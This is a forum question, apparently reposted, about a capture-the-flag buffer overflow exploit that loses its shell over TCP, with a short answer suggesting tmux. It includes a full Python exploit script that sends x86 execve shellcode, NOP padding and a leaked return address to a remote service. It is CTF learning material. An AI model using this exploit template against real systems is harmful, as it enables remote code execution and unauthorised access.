
Buffer overflow exploit over TCP won't keep shell open

I have crafted a buffer overflow exploit for a remote machine for this CTF. The challenge prints out an address, which you then have to use in order to know where your shellcode is being stored. Attached is my current exploit code:

import sys
import socket
import struct
import time
from ast import literal_eval

if len(sys.argv) != 3:
    print "Usage: %s host port" % (sys.argv[0])
    sys.exit(0)

s = socket.create_connection([sys.argv[1], int(sys.argv[2])])
recieved = s.recv(4096)   # banner that contains the leaked buffer address
print(recieved)
# send the menu choice (5 bytes, "9999\n") that leads to the vulnerable code path
s.send("9999\n")
time.sleep(.2)
raw_input("EXPLOIT ?? ")

print s.recv(4096)

# x86-32 execve("/bin//sh") shellcode followed by exit()
sh = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" 
pad = "\x90" * 251
# leaked address parsed from the banner, packed in native byte order (little-endian on x86)
IP = struct.pack("I",literal_eval(recieved[13:23]))
print("ADDR: ", recieved[13:23])
s.send(sh + pad + IP)

Essentially, first I am creating the connection, then I am sending an input that directs the program to where it needs to go in order for the exploit to be possible (not really relevant for this question).

Next I create the exploit itself

The basic premise is:

shellcode + padding + eip

The eip address comes from what is given to me by the output of the program (which is what I am parsing in the IP variable).

That address is the beginning of the buffer, which is where my shellcode starts, and thus where I want to jump to.

I am running the binary using socat so that it is identical to the challenge hosted on the CTF's servers. I attach to the process using GDB and then run my exploit. It succeeds but gives this output:

process 2422 is executing new program: /usr/bin/dash
[Inferior 1 (process 2422) exited normally]
(gdb) 

and my connection to the service is terminated.

If I was running this with a local binary, I would use (python file.py ; cat - ;) | ./program to keep the stream open, but that is not an option since I need what the program outputs and have to do it remotely. I have tried using Telnet as well, but then the program just hangs and nothing happens.

Running the exploit script through tmux worked for me.

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address. Any question please contact: yoyou2525@163.com.
